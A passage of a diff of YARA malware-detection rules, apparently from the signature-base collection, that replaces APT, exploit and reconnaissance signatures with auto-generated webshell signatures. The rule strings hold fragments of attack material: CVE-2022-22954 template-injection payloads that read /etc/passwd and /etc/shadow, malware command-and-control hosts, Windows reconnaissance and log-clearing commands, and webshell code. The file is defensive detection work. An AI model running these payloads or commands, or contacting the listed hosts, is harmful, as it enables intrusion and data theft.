relation with APT against Honk Kong protesters" - author = "Florian Roth (Nextron Systems)" - id = "eb37a22b-4e8a-5986-bd47-4ef5b4986f47" - date = "2014-10-10" - modified = "2023-12-05" - reference = "https://github.com/Neo23x0/signature-base" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/thor-webshells.yar#L9027-L9042" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "ec3f1e985585e1bf77a46e971a20cd127064a64467761a5a570548dd63ec57e2" - score = 50 + description = "Detects imphash often found in malware samples (Maximum 0,25% hits with search for 'imphash:x p:0' on Virustotal) = 99,75% hits" + author = "Arnim Rupp (https://github.com/ruppde)" + id = "eb91e700-6478-5085-a393-a7b342c0eb4f" + date = "2023-03-23" + modified = "2023-07-24" + reference = "Internal Research" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/gen_imphash_detection.yar#L297-L329" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "b5296cf0eb22fba6e2f68d0c9de9ef7845f330f7c611a0d60007aa87e270c62a" + hash = "5a5a5f71c2270cea036cd408cde99f4ebf5e04a751c558650f5cb23279babe6d" + hash = "481b0d9759bfd209251eccb1848048ebbe7bd2c87c5914a894a5bffc0d1d67ff" + hash = "716ba6ea691d6a391daedf09ae1262f1dc1591df85292bff52ad76611666092d" + hash = "800d160736335aafab10503f7263f9af37a15db3e88e41082d50f68d0ad2dabd" + hash = "416155124784b3c374137befec9330cd56908e0e32c70312afa16f8220627a52" + hash = "21899e226502fe63b066c51d76869c4ec5dbd03570551cea657d1dd5c97e7070" + hash = "0461830e811d3831818dac5a67d4df736b4dc2e8fb185da439f9338bdb9f69c3" + hash = "773edc71d52361454156dfd802ebaba2bb97421ce9024a7798dcdee3da747112" + hash = "fe53b9d820adf3bcddf42976b8af1411e87d9dfd9aa479f12b2db50a5600f348" + logic_hash = "f11de8b7f78cdfc79116670409c31745e2803ef8b8e97d08be012f1146b3d816" + score = 45 quality = 85 - tags = "WEBSHELL" - license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" - - strings: - $a0 = "" condition: - uint16(0)==0x4b50 and 1 of them + all of them } -rule SIGNATURE_BASE_SUSP_EXPL_POC_Vmware_Workspace_ONE_CVE_2022_22954_Apr22 : CVE_2022_22954 +rule SIGNATURE_BASE_Byshell063_Ntboot_2 { meta: - description = "Detects payload as seen in PoC code to exploit Workspace ONE Access freemarker server-side template injection CVE-2022-22954" - author = "Florian Roth" - id = "b7b7cefb-96f5-53f9-b6fc-6e798f557c5d" - date = "2022-04-08" - modified = "2023-04-28" - old_rule_name = "EXPL_POC_VMWare_Workspace_ONE_CVE_2022_22954_Apr22" - reference = "https://twitter.com/rwincey/status/1512241638994853891/photo/1" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/exploit_cve_2022_22954_vmware_workspace_one.yar#L2-L22" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "2fb23bfc28140f818b9fc630b0c1bf0c70a8f4f85b9516cefe2ff26a9de6516c" - score = 70 + description = "Webshells Auto-generated - file ntboot.dll" + author = "Florian Roth (Nextron Systems)" + id = "9bcb401d-619b-54b8-be51-f0e3b6eb096c" + date = "2023-12-05" + modified = "2023-12-05" + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8794-L8805" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d" + logic_hash = "25df29000bb410c0ba1fec78920124f6eedbc2585541536239522d2b116270ab" + score = 75 quality = 85 - tags = "CVE-2022-22954" + tags = "" + license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $x1 = "66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28" ascii - $x2 = "${\"freemarker.template.utility.Execute\"?new()(" - $x3 = "cat /etc/passwd\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute" - $x4 = "cat /etc/passwd\\\")).(#execute=#instancemanager.newInstance(\\\"freemarker.template.utility.Execute" - $x5 = "cat /etc/shadow\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute" - $x6 = "cat /etc/shadow\\\")).(#execute=#instancemanager.newInstance(\\\"freemarker.template.utility.Execute" + $s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)" condition: - 1 of them + all of them } -rule SIGNATURE_BASE_MAL_Backdoor_Naikon_APT_Sample1 : FILE +rule SIGNATURE_BASE_U_Uay { meta: - description = "Detects backdoors related to the Naikon APT" + description = "Webshells Auto-generated - file uay.exe" author = "Florian Roth (Nextron Systems)" - id = "ba79285b-7c7f-5b19-837e-6696e50a2866" - date = "2015-05-14" - modified = "2023-01-06" - reference = "https://goo.gl/7vHyvh" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/apt_naikon.yar#L2-L36" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - hash = "d5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba" - hash = "f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96" - logic_hash = "e582fc3518dab2392a79909b5369c48656b6f280b915fad4befb0839ec7ce1bd" + id = "6a670e19-6e53-5b13-aabf-fe74d48b9113" + date = "2023-12-05" + modified = "2023-12-05" + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8806-L8818" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4" + logic_hash = "45e8938ce34fd5a253cee3867aa8c4429c6bf3fcc91098ed9df3f95656bc5f8f" score = 75 quality = 85 - tags = "FILE" + tags = "" + license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $x0 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii - $x1 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii - $x2 = "greensky27.vicp.net" fullword ascii - $x3 = "\\tempvxd.vxd.dll" wide - $x5 = "otna.vicp.net" fullword ascii - $s1 = "User-Agent: webclient" fullword ascii - $s2 = "\\User.ini" ascii - $s3 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200" ascii - $s4 = "\\UserProfile.dll" wide - $s5 = "Connection:Keep-Alive: %d" fullword ascii - $s6 = "Referer: http://%s:%d/" ascii - $s7 = "%s %s %s %d %d %d " fullword ascii - $s8 = "%s--%s" fullword wide - $s9 = "Run File Success!" fullword wide - $s10 = "DRIVE_REMOTE" fullword wide - $s11 = "ProxyEnable" fullword wide - $s12 = "\\cmd.exe" wide + $s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe" + $s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security" condition: - uint16(0)==0x5a4d and filesize <1000KB and (1 of ($x*) or 7 of ($s*)) + 1 of them } -rule SIGNATURE_BASE_STUXSHOP_Config +rule SIGNATURE_BASE_Bin_Wuaus { meta: - description = "Stuxshop standalone sample configuration" - author = "JAG-S (turla@chronicle.security)" - id = "67367db5-51b3-5177-960a-5b06161154e2" + description = "Webshells Auto-generated - file wuaus.dll" + author = "Florian Roth (Nextron Systems)" + id = "50b5323b-d8d1-5350-bf93-8dde3d11fd87" date = "2023-12-05" modified = "2023-12-05" - reference = "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/apt_stuxshop.yar#L2-L30" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - hash = "c1961e54d60e34bbec397c9120564e8d08f2f243ae349d2fb20f736510716579" - logic_hash = "9dd57f8b4e25a53dcf54dc75a1bb26675c7dd04dbb4d96286bcc0a6527a21782" + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8819-L8835" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "46a365992bec7377b48a2263c49e4e7d" + logic_hash = "0509ca39662430c3ababf65ca3a6e9af95250163980829d90eddf5341168c864" score = 75 quality = 85 tags = "" + license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $cnc1 = "http://211.24.237.226/index.php?data=" ascii wide - $cnc2 = "http://todaysfutbol.com/index.php?data=" ascii wide - $cnc3 = "http://78.111.169.146/index.php?data=" ascii wide - $cnc4 = "http://mypremierfutbol.com/index.php?data=" ascii wide - $regkey1 = "Software\\Microsoft\\Windows\\CurrentVersion\\MS-DOS Emulation" ascii wide - $regkey2 = "NTVDMParams" ascii wide - $flowerOverlap1 = { 85 C0 75 3B 57 FF 75 1C FF 75 18 FF 75 14 50 FF 75 10 FF 75 FC FF 15 } - $flowerOverlap2 = { 85 C0 75 4C 8B 45 1C 89 45 0C 8D 45 0C 50 8D 45 08 FF 75 18 50 6A 00 FF 75 10 FF 75 20 FF 15 } - $flowerOverlap3 = { 55 8B EC 53 56 8B 75 20 85 F6 74 03 83 26 00 8D 45 20 50 68 19 00 02 00 6A 00 FF 75 0C FF 75 08 } - $flowerOverlap4 = { 55 8B EC 51 8D 4D FC 33 C0 51 50 6A 26 50 89 45 FC FF 15 } - $flowerOverlap5 = { 85 DB 74 04 8B C3 EB 1A 8B 45 08 3B 45 14 74 07 B8 5D 06 00 00 EB 0B 85 F6 74 05 8B 45 0C 89 06 } - $flowerOverlap6 = { 85 FF 74 12 83 7D F8 01 75 0C FF 75 0C FF 75 08 FF 15 } + $s1 = "9(90989@9V9^9f9n9v9" + $s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:" + $s3 = ";(=@=G=O=T=X=\\=" + $s4 = "TCP Send Error!!" + $s5 = "1\"1;1X1^1e1m1w1~1" + $s8 = "=$=)=/=<=Y=_=j=p=z=" condition: - all of ($flowerOverlap*) or 2 of ($cnc*) or all of ($regkey*) + all of them } -rule SIGNATURE_BASE_STUXSHOP_Oscheck +rule SIGNATURE_BASE_Pwreveal { meta: - description = "Identifies the OS Check function in STUXSHOP and CheshireCat" - author = "Silas Cutler (havex@Chronicle.Security)" - id = "24fb5c6f-d5ab-5f17-942c-b712e2c017d4" + description = "Webshells Auto-generated - file pwreveal.exe" + author = "Florian Roth (Nextron Systems)" + id = "3d79dd13-9012-56e2-b42a-e6b3e204c601" date = "2023-12-05" modified = "2023-12-05" reference = "https://github.com/Neo23x0/signature-base" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/apt_stuxshop.yar#L32-L47" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - hash = "c1961e54d60e34bbec397c9120564e8d08f2f243ae349d2fb20f736510716579" - logic_hash = "3dca26e622289c2d244e3af035e892455a47daa67dbe0c6fad29d9f7403cbc6b" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8836-L8850" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "b4e8447826a45b76ca45ba151a97ad50" + logic_hash = "01c9582897c65e608d49a151fe9ade97b9a031d7d10f5fd4b4d0c2a3fd83e7b6" score = 75 quality = 85 tags = "" + license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $ = {10 F7 D8 1B C0 83 C0 ?? E9 ?? 01 00 00 39 85 7C FF FF FF 0F 85 ?? 01 00 - 00 83 BD 70 FF FF FF 04 8B 8D 74 FF FF FF 75 0B 85 C9 0F 85 ?? 01 00 00 6A 05 - 5E } - $ = {01 00 00 3B FA 0F 84 ?? 01 00 00 80 7D 80 00 B1 62 74 1D 6A 0D 8D 45 80 - 68 ?? ?? ?? 10 50 FF 15 ?? ?? ?? 10 83 C4 0C B1 6F 85 C0 75 03 8A 4D 8D 8B C6 - } + $s0 = "*NetBios Name: \\\\\" & Snet.ComputerName &" condition: - uint16(0)==0x457f and ( all of ($op*) or $xc1) + all of them } -rule SIGNATURE_BASE_BKDR_Xzutil_Killswitch_CVE_2024_3094_Mar24_1 : CVE_2024_3094 +rule SIGNATURE_BASE_Cmdshell { meta: - description = "Detects kill switch used by the backdoored XZ library (xzutil) CVE-2024-3094." - author = "Florian Roth" - id = "0d28bec4-1d3a-5af0-9e9e-49486fcc62e1" - date = "2024-03-30" - modified = "2024-04-24" - reference = "https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01?permalink_comment_id=5006558#gistcomment-5006558" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/bkdr_xz_util_cve_2024_3094.yar#L48-L60" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "b2024d4b8346c4f74524bb7f3c6b2850684c19471a00e6fa60fff1c41e4a86b6" - score = 85 + description = "Webshells Auto-generated - file cmdShell.asp" + author = "Florian Roth (Nextron Systems)" + id = "be256fc4-8dc5-58e4-9ca2-5a1df936b8dd" + date = "2023-12-05" + modified = "2023-12-05" + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8890-L8901" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "8a9fef43209b5d2d4b81dfbb45182036" + logic_hash = "5e7c7537b355b162d58b8bce570b1f94a8e6b479856685a245ffaed8f9482680" + score = 75 quality = 85 - tags = "CVE-2024-3094" + tags = "" + license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $x1 = "yolAbejyiejuvnup=Evjtgvsh5okmkAvj" + $s1 = "if cmdPath=\"wscriptShell\" then" condition: - $x1 + all of them } -rule SIGNATURE_BASE_SUSP_OBFUSC_SH_Indicators_Mar24_1 : FILE +rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Nc { meta: - description = "Detects characteristics found in obfuscated script (used in the backdoored XZ package, but could match on others, too)" - author = "Florian Roth" - id = "f9fcc326-75d6-5a5a-a8b5-7de15a11448e" - date = "2024-04-06" - modified = "2024-04-24" - reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4/1" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/bkdr_xz_util_cve_2024_3094.yar#L62-L75" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "b5abf8184e0b1b18ccc513e00e9db241b4983923ae97f495396d73f0fb162192" - score = 60 + description = "Webshells Auto-generated - file nc.exe" + author = "Florian Roth (Nextron Systems)" + id = "106209fc-f957-5131-825b-8eb7835625e0" + date = "2023-12-05" + modified = "2023-12-05" + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8902-L8916" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "2cd1bf15ae84c5f6917ddb128827ae8b" + logic_hash = "6106758aedb33f8983f387a58fcd815c47f793cd2a7ea3b0ebed13dd1d5b6e83" + score = 75 quality = 85 - tags = "FILE" + tags = "" + license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $s1 = "eval $" + $s0 = "WSOCK32.dll" + $s1 = "?bSUNKNOWNV" + $s7 = "p@gram Jm6h)" + $s8 = "ser32.dllCONFP@" condition: - uint8(1)==0x3d and $s1 in ( filesize -20.. filesize ) + all of them } -rule SIGNATURE_BASE_Recon_Commands_Windows_Gen1 : FILE +rule SIGNATURE_BASE_Portlessinst { meta: - description = "Detects a set of reconnaissance commands on Windows systems" + description = "Webshells Auto-generated - file portlessinst.exe" author = "Florian Roth (Nextron Systems)" - id = "bc95265c-780d-5451-bd12-d14495877e46" - date = "2017-07-10" + id = "c641c522-7844-5002-8ae7-4aaf60d1337d" + date = "2023-12-05" modified = "2023-12-05" - reference = "https://goo.gl/MSJCxP" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/gen_recon_indicators.yar#L12-L50" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "36beb09c428949140cb007c1022c385c9a1ae4eea8c1f1a419f96b36b8030c7c" - score = 60 + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8917-L8930" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "74213856fc61475443a91cd84e2a6c2f" + logic_hash = "72ca80de2ad2048d1fcbbffeebd0e4fd7d9d47d6736360674e6a85ef9943abe8" + score = 75 quality = 85 - tags = "FILE" + tags = "" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $s1 = "netstat -an" ascii - $s2 = "net view" ascii fullword - $s3 = "net user" ascii fullword - $s4 = "whoami" ascii - $s5 = "tasklist /v" ascii - $s6 = "systeminfo" ascii - $s7 = "net localgroup administrators" ascii - $s8 = "net user administrator" ascii - $s9 = "regedit -e " ascii - $s10 = "tasklist /svc" ascii - $s11 = "regsvr32 /s /u " ascii - $s12 = "CreateObject(\"WScript.Shell\").RegWrite" ascii - $s13 = "bitsadmin /rawreturn /transfer getfile" ascii - $s14 = "wmic qfe list full" ascii - $s15 = "schtasks.exe /create " ascii nocase - $s16 = "wmic share get" ascii - $s17 = "wmic nteventlog get" ascii - $s18 = "wevtutil cl " ascii - $s19 = "sc query type= service" ascii - $s20 = "arp -a " ascii - $fp1 = "avdapp.dll" fullword wide - $fp2 = "keyword.command.batchfile" ascii - $fp3 = ".sublime-settings" ascii + $s2 = "Fail To Open Registry" + $s3 = "f<-WLEggDr\"" + $s6 = "oMemoryCreateP" condition: - filesize <1000KB and 4 of them and not 1 of ($fp*) + all of them } -rule SIGNATURE_BASE_SUSP_Recon_Outputs_Jun20_1 : FILE +rule SIGNATURE_BASE_Setupbdoor { meta: - description = "Detects outputs of many different commands often used for reconnaissance purposes" + description = "Webshells Auto-generated - file SetupBDoor.exe" author = "Florian Roth (Nextron Systems)" - id = "ec3759aa-212f-52ce-9f38-636accd35749" - date = "2020-06-04" + id = "055ff783-fa9f-5037-a3d6-88b58ec1612f" + date = "2023-12-05" modified = "2023-12-05" - reference = "https://securelist.com/cycldek-bridging-the-air-gap/97157/" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/gen_recon_indicators.yar#L52-L74" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "652b28bfb45a11eaaee198c76560c1f55edc5b32c5394e606bb5426551260f24" - score = 60 + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8931-L8942" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "41f89e20398368e742eda4a3b45716b6" + logic_hash = "b4b6a0e4b9f8975d769d340a420af37dbc344d32c72447a8c56b05e985e6d806" + score = 75 quality = 85 - tags = "FILE" + tags = "" + license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $s1 = ". . . . : Yes" ascii - $s2 = "with 32 bytes of data:" ascii - $s3 = "ff-ff-ff-ff-ff-ff static" ascii - $s4 = " TCP 0.0.0.0:445" ascii - $s5 = "System Idle Process" ascii + $s1 = "\\BDoor\\SetupBDoor" condition: - filesize <150KB and 4 of them + all of them } -rule SIGNATURE_BASE_Unspecified_Malware_Jul17_2C : FILE +rule SIGNATURE_BASE_Phpshell_3 { meta: - description = "Unspecified Malware - CN relation" + description = "Webshells Auto-generated - file phpshell.php" author = "Florian Roth (Nextron Systems)" - id = "91e760e8-7460-54af-a794-0b41a4b19760" - date = "2017-07-18" + id = "2f0ddfef-b3b5-592b-a9fb-fae4d825d0af" + date = "2023-12-05" modified = "2023-12-05" - reference = "https://goo.gl/CX3KaY" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/gen_unspecified_malware.yar#L3-L26" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "a078b96ea15b287c8aed960741865aeac356ec8650eac71b8e28f2f1924ec956" + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8943-L8955" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "e8693a2d4a2ffea4df03bb678df3dc6d" + logic_hash = "b86fa40fd7bbcae86926182882faa226530e44c20bc611b8433a7da7f012106c" score = 75 quality = 85 - tags = "FILE" + tags = "" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" - hash1 = "e8156ec1706716cada6f57b6b8ccc9fb0eb5debe906ac45bdc2b26099695b8f5" strings: - $x1 = "%AllUsersProfile%\\DeviceSync\\m.exe" fullword wide - $x2 = "freenow.chickenkiller.com" fullword ascii - $x3 = "\\Release\\PhantomNet-SSL.pdb" ascii - $s1 = "SELECT * FROM AntiVirusProduct" fullword ascii - $s2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%08X-%04X-%04X-%02X%02X%02X%02X" fullword ascii - $s3 = "Proxy-Authenticate: Basic" fullword ascii - $s4 = "Proxy-Authenticate: NTLM" fullword ascii - $s5 = "Root\\SecurityCenter2" fullword wide - $s6 = "aaabbbcccddd" fullword ascii + $s3 = "

" + $s5 = " echo \"\\n\";" condition: - ( uint16(0)==0x5a4d and filesize <400KB and (1 of ($x*) or 4 of ($s*))) or ( all of them ) + all of them } -rule SIGNATURE_BASE_Triton_Trilog : FILE +rule SIGNATURE_BASE_BIN_Server { meta: - description = "Detects Triton APT malware - file trilog.exe" + description = "Webshells Auto-generated - file Server.exe" author = "Florian Roth (Nextron Systems)" - id = "ae2c9b47-2a67-50c6-9d2a-dc47b4fa69ef" - date = "2017-12-14" + id = "1625b0ee-5f9f-57d8-8333-f175f46d6c59" + date = "2023-12-05" modified = "2023-12-05" - reference = "https://goo.gl/vtQoCQ" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/apt_triton.yar#L70-L85" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "6406e9e7651978a6817079945dc801afdb6c16dd107527cbfd9a946eca27a51a" + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8956-L8972" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "1d5aa9cbf1429bb5b8bf600335916dcd" + logic_hash = "34f9d78e0f61717fae2945e7a833c2c6d59e28035ee95da2c5d32b4e196bc957" score = 75 quality = 85 - tags = "FILE" + tags = "" license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" - hash1 = "e8542c07b2af63ee7e72ce5d97d91036c5da56e2b091aa2afe737b224305d230" strings: - $s1 = "inject.bin" ascii - $s2 = "PYTHON27.DLL" fullword ascii - $s3 = "payload" ascii + $s0 = "configserver" + $s1 = "GetLogicalDrives" + $s2 = "WinExec" + $s4 = "fxftest" + $s5 = "upfileok" + $s7 = "upfileer" condition: - uint16(0)==0x5a4d and filesize <60KB and all of them + all of them } -rule SIGNATURE_BASE_Dropper_Deploysmalwareviasideloading +rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006 { meta: - description = "Detects a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX" - author = "USG" - id = "2e7cdedd-2358-5d71-a3ec-73dec442d840" - date = "2024-04-17" - modified = "2024-04-17" - reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/apt_uscert_ta17-1117a.yar#L9-L21" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "51d8a0785bc25cf02460b9b7490ccba3d67806c953e6aa3d3882341ce11857fa" + description = "Webshells Auto-generated - file 2006.asp" + author = "Florian Roth (Nextron Systems)" + id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc" + date = "2023-12-05" + modified = "2023-12-05" + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8973-L8984" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "c19d6f4e069188f19b08fa94d44bc283" + logic_hash = "536232bbdd21bddb88eefe06a82927abcdd3ed10404c052957896960a6d10932" score = 75 quality = 85 tags = "" - true_positive = "5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx. " + license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $UniqueString = {2e 6c 6e 6b [0-14] 61 76 70 75 69 2e 65 78 65} - $PsuedoRandomStringGenerator = {b9 1a [0-6] f7 f9 46 80 c2 41 88 54 35 8b 83 fe 64} + $s6 = "strBackDoor = strBackDoor " condition: - any of them + all of them } -rule SIGNATURE_BASE_REDLEAVES_Droppedfile_Implantloader_Starburn +rule SIGNATURE_BASE_R57Shell_3 { meta: - description = "Detects the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT" - author = "USG" - id = "976f42b1-58c9-554b-97e6-130a657507e2" - date = "2024-04-17" - modified = "2024-04-17" - reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A" - source_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/yara/apt_uscert_ta17-1117a.yar#L23-L34" - license_url = "https://github.com/Neo23x0/signature-base/blob/c3fb6b179826dfb6bd146f4fa64fa9d7f84bc358/LICENSE" - logic_hash = "2ebfdaf363ac80bc9bace3056ff86efd9c1b246c6f60373a82df4a0db901a6e3" + description = "Webshells Auto-generated - file r57shell.php" + author = "Florian Roth (Nextron Systems)" + id = "4129d77c-2981-587b-a83e-8767dc3a48d8" + date = "2023-12-05" + modified = "2023-12-05" + reference = "https://github.com/Neo23x0/signature-base" + source_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/yara/thor-webshells.yar#L8985-L8996" + license_url = "https://github.com/Neo23x0/signature-base/blob/f448cbc9db16ac30559ce5a5c848317478569207/LICENSE" + hash = "87995a49f275b6b75abe2521e03ac2c0" + logic_hash = "0fdca080c7ce57b7bd818a968840aebf3c5c74f188ed062fec794bfadb4e75b0" score = 75 quality = 85 tags = "" - true_positive = "7f8a867a8302fe58039a6db254d335ae" + license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE" strings: - $XOR_Loop = {32 0c 3a 83 c2 02 88 0e 83 fa 08 [4-14] 32 0c 3a 83 c2 02 88 0e 83 fa 10} + $s1 = "\".$_POST['cmd']" condition: - any of them + all of them } -rule 